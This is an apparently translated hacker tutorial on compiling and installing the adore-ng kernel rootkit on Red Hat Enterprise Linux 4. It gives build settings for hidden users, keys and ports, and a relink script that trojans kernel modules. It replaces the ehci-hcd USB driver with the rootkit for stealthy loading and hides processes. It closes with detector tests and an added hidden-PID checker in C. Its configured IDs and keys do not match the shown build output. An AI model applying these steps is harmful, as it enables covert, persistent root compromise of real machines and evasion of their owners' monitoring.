Preface: kernel 2.6 has marched into the Linux world, and those who write backdoors and those who use them have to keep up with the trend.

Abbreviations: fc: Fedora Core; rh: Red Hat; rhel4: Red Hat Enterprise Linux 4; sk: SucKIT; adore: adore-ng; rk: rootkit; lkm: loadable kernel module.

What is adore-ng? An LKM rootkit; googling "adore" turns up plenty of detailed introductions.

Why choose it?
1. I never got hold of an sk for 2.6.
2. Since fc2, Red Hat's kernels disable kmem by default, so sk cannot inject itself into the kernel on the fly; at the same time, many rk checkers stop working too :)
3. adore was written by the great Stealth, has a long history and has had a lot of people testing it, so it should be more stable than other LKMs. The stability of an LKM has a serious effect on the stability of the system, so we have to be careful in our choice: no matter how powerful the features are, if it hangs the box after a bit of playing and gets you noticed on top of that, it isn't worth it.

Look at the features:

    [root@RHEL4 adore-ng]# cat FEATURES
    If you never used adore before, here's a list of supported things:
    o runs on kernel 2.4.x UP and SMP systems
    o runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
    o file and directory hiding
    o process hiding
    o socket-hiding (no matter whether LISTENing, CONNECTED etc)
    o full-capability back door
    o does not utilize sys_call_table but VFS layer
    o KISS principle, to have as less things in there as possible but also being as much powerful as possible
    o hides itself from /proc and /sys filesystems
    o syslog filtering: logs generated by hidden processes never appear on the syslog UNIX socket anymore
    o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes do not appear in the file, except you force it by using special hidden AND authenticated process (a sshd back door is usually only hidden thus xtmp entries written by sshd don't make it to disk)
    o (optional) relinking of LKMs as described in phrack #61 aka LKM infection to make it possible to be automatically reloaded after reboots (2.4 and 2.6)

Environment for this post: a real machine, not a virtual machine.

    [root@RHEL4 adore-ng]# uname -a; cat /etc/RedHat-release
    linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/linux
    Red Hat Enterprise linux AS release 4 (Nahant)

Download: google adore-ng, or have a look on 素包子's site, http://baoz.net.

Editing and compiling:

    [root@RHEL4 adore-ng]# mv Makefile.2.6 Makefile

Then edit the following entries:

    EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
    EXTRA_CFLAGS+=-DCURRENT_ADORE=54
    EXTRA_CFLAGS+=-DADORE_KEY="fgjgggfd"

These are the hidden TCP ports; leave the trailing 0 alone:

    u_short HIDDEN_SERVICES[] = {2222, 7350, 0};

If your machine is SMP, enable the following:

    EXTRA_CFLAGS+=-D__SMP__

Set the location of your kernel source:

    KERNEL_SOURCE=/usr/src/linux

OK, save, quit and make:

    [root@RHEL4 adore-ng]# make
    cc -DELITE_UID=2648745389U -DELITE_GID=6063589279U -DCURRENT_ADORE=54 -DADORE_KEY="djksdfnvn" -DHIDE ava.c libinvisible.c -o ava
    ava.c:47: warning: integer constant is too large for "unsigned long" type
    ava.c:47: warning: large integer implicitly truncated to unsigned type
    libinvisible.c: In function `adore_hidefile':
    libinvisible.c:76: warning: integer constant is too large for "unsigned long" type
    libinvisible.c:76: warning: large integer implicitly truncated to unsigned type
    make -C /usr/src/linux SUBDIRS=`pwd` modules
    make[1]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686'
      CC [M]  /root/adore-ng/adore-ng-2.6.o
    /root/adore-ng/adore-ng-2.6.c:56: warning: `MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
    /root/adore-ng/adore-ng-2.6.c:59: warning: `MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
    /root/adore-ng/adore-ng-2.6.c:61: warning: `MODULE_PARM_' is deprecated (declared at include/linux/module.h:552)
    /root/adore-ng/adore-ng-2.6.c: In function `adore_opt_filldir':
    /root/adore-ng/adore-ng-2.6.c:281: warning: integer constant is too large for "unsigned long" type
    /root/adore-ng/adore-ng-2.6.c:281: warning: comparison is always false due to limited range of data type
    /root/adore-ng/adore-ng-2.6.c: In function `adore_root_filldir':
    /root/adore-ng/adore-ng-2.6.c:363: warning: integer constant is too large for "unsigned long" type
    /root/adore-ng/adore-ng-2.6.c:363: warning: comparison is always false due to limited range of data type
      Building modules, stage 2.
      MODPOST
      CC      /root/adore-ng/adore-ng-2.6.mod.o
      LD [M]  /root/adore-ng/adore-ng-2.6.ko
    make[1]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686'
    cc -O2 symsed.c -o symsed

A word about its relink, the feature that splices adore into some other module. Let's see what it does (from the relink script):

    # copy the victim LKM aside, strip its symbols and link adore into it
    system("cp $lkm_path t.ko");
    system("./symsed t.ko zero; ld -r adore-ng-2.6.ko t.ko -o z.ko; rm -f t.ko");
    print "\nCopy trojaned LKM back to original LKM? (y/n)\n";
    while ($yn !~ /^(y|n)$/i) {
        $yn = <STDIN>;
        $yn =~ s/\n//;
    }
    if ($yn =~ /y/i) {
        system("cp z.ko $lkm_path");
    } else {
        print "\nOutput LKM is z.ko\n";
    }

On RHEL4, after I spliced adore into a module that way, the module would no longer load. No matter: instead of splicing in, we replace :) Very few people run modprobe -r after installing the system, so we can easily replace some module the system does not particularly need. Let's look at my modules:

    [root@RHEL4 adore-ng]# lsmod
    Module                  Size  Used by
    dm_mod                 54741  0
    ohci_hcd               21713  0
    snd_intel8x0           33769  0
    snd_ac97_codec         63889  1 snd_intel8x0
    snd_pcm_oss            49017  0
    snd_mixer_oss          17985  1 snd_pcm_oss
    snd_pcm                96841  2 snd_intel8x0,snd_pcm_oss
    snd_timer              29893  1 snd_pcm
    snd_page_alloc          9673  2 snd_intel8x0,snd_pcm
    snd_mpu401_uart         8769  1 snd_intel8x0
    snd_rawmidi            26597  1 snd_mpu401_uart
    snd_seq_device          8137  1 snd_rawmidi
    snd                    54949  9 snd_intel8x0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device
    soundcore               9889  1 snd
    sis900                 18756  0
    ext3                  116809  1
    jbd                    71257  1 ext3

We pick a module whose "Used by" is 0 and that is not used much, a USB driver for instance, heh. ehci_hcd is not in the list because I already used it; ohci_hcd or the sound card modules would also do. See where it lives:

    [root@RHEL4 adore-ng]# modprobe -l | grep ehci
    /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko

Unload it:

    [root@RHEL4 adore-ng]# modprobe -r ehci-hcd

Replace it:

    [root@RHEL4 adore-ng]# cp adore-ng-2.6.ko /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko

Load it:

    [root@RHEL4 adore-ng]# modprobe ehci-hcd

Check it:

    [root@RHEL4 adore-ng]# ./ava I
    Checking for adore 0.12 or higher ...
    Adore 1.54 installed. Good luck.
    ELITE_UID: 2648745389, ELITE_GID=1768621983, ADORE_KEY=djksdfnvn CURRENT_ADORE=54

Weak spot: if the other side runs tripwire (installed by default on RHEL4), the replacement of ehci-hcd.ko is easily exposed. There is no way around that, though; a relinked module would be exposed just the same, heh.

Questions:

1. "Hidden ports (adore-ng.h) go decimal, i.e. '2222' hides everything which belongs to port 2222." I read this sentence as also hiding the processes that belong to port 2222; perhaps I misunderstood its "everything" :)

    [root@RHEL4 ~]# nc -vvnlp 2222
    listening on [any] 2222 ...

    [root@RHEL4 adore-ng]# ps aux | grep 2222
    root      1938  0.0  0.1  1724  496 pts/1    S+   13:34   0:00 nc -vvnlp 2222
    root      1941  0.0  0.1  5304  684 pts/0    S+   13:36   0:00 grep 2222

2. The "full-capability back door":

    [root@RHEL4 adore-ng]# grep full-capability FEATURES
    o full-capability back door

This is a bit of an oversell; the backdoor is plainly a local root, and personally I don't call a local root a backdoor.

    [root@RHEL4 adore-ng]# ./ava | grep root
    r execute as root

Presumably that is what it refers to.

Improvements:

1. Hide specific processes by process name. That would make us far more flexible and make up for adore's weakness as a backdoor, used together with some bindport or connect-back backdoor; otherwise we cannot even get into the system, and then hiding or not hiding means nothing to us. At the moment it only hides by pid, and once the machine reboots the pid is bound to change...
2. Add a port-reuse or connect-back backdoor feature, something like sk's.

Detection:

1. The official checking tool, http://stealth.openwall.net/rootkits/removal/determine-0-24.tgz:

    [root@RHEL4 determine]# ./determine
    deter-mine LKM rootkit detector. (C) 2004 Stealth
    Trying to detect hidden processes ...
    Done. Scanning /dev/mem for signatures. This may take a while ...
    Did not find any sign of a LKM rootkit.

Let's hide a process and see:

    [root@RHEL4 determine]# ava i 1557
    Checking for adore 0.12 or higher ...
    Adore 1.54 installed. Good luck.
    Made PID 1557 invisible.

Check again:

    [root@RHEL4 determine]# ./determine
    deter-mine LKM rootkit detector. (C) 2004 Stealth
    Trying to detect hidden processes ...
    Process with PID 1557 does not have a appropriate /proc entry. Hidden?
    Done. Scanning /dev/mem for signatures. This may take a while ...
    Unusual behaivior has been detected. Please consult the removal chapter of the README-file.   <-- detected

2. chkrootkit (chkrootkit-0.46a): this one can find that a process has been hidden.
3. rkhunter (rkhunter-1.2.8): this thing does not even check for hidden processes, and it calls itself a hunter... To be fair, it is quite thorough in other respects.
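The first pass of determine above, the one that caught PID 1557, rests on a simple cross-check: a PID that answers a kill(pid, 0) probe must also show up when /proc is listed. Here is that check as an added example in C; it is not code from the original post or from determine itself, and the 32768 PID ceiling and the second /proc listing (to absorb processes created while probing) are my own assumptions.

```c
/* Added example, not from the post or from determine: probe every PID with
 * kill(pid, 0) and compare against two readdir() listings of /proc. A PID that
 * exists but appears in neither listing is exactly what an adore-style filldir
 * hook on /proc produces for a hidden process. */
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_PID 32768   /* assumption: the classic 2.6 pid_max */

/* Mark in seen[] every numeric entry that a readdir() of /proc returns. */
static int list_proc(unsigned char *seen)
{
    DIR *d = opendir("/proc");
    struct dirent *e;
    if (!d) return -1;
    while ((e = readdir(d)) != NULL) {
        char *end;
        long pid = strtol(e->d_name, &end, 10);
        if (*end == '\0' && pid > 0 && pid < MAX_PID)
            seen[pid] = 1;
    }
    closedir(d);
    return 0;
}

/* kill(pid, 0) delivers no signal: 0 or EPERM means the PID exists, ESRCH
 * means it does not. The second /proc listing keeps processes that were
 * created during the probe loop from being reported. Returns the number of
 * hidden PIDs (the first outlen are stored in out), or -1 if /proc fails. */
int find_hidden_pids(int *out, int outlen)
{
    unsigned char seen[MAX_PID] = {0};
    int cand[MAX_PID], nc = 0, n = 0;
    if (list_proc(seen) < 0) return -1;
    for (int pid = 1; pid < MAX_PID; pid++)
        if (!seen[pid] && (kill(pid, 0) == 0 || errno == EPERM))
            cand[nc++] = pid;
    if (list_proc(seen) < 0) return -1;
    for (int i = 0; i < nc; i++) {
        if (seen[cand[i]]) continue;      /* appeared after the first pass */
        if (n < outlen) out[n] = cand[i];
        n++;
    }
    return n;
}
```

Call find_hidden_pids() from a main of your own and print whatever it returns; root is not required, because EPERM already proves the PID exists. Like determine, this only sees processes hidden from /proc directory listings, so it says nothing about the replaced ehci-hcd.ko itself; that is tripwire's job.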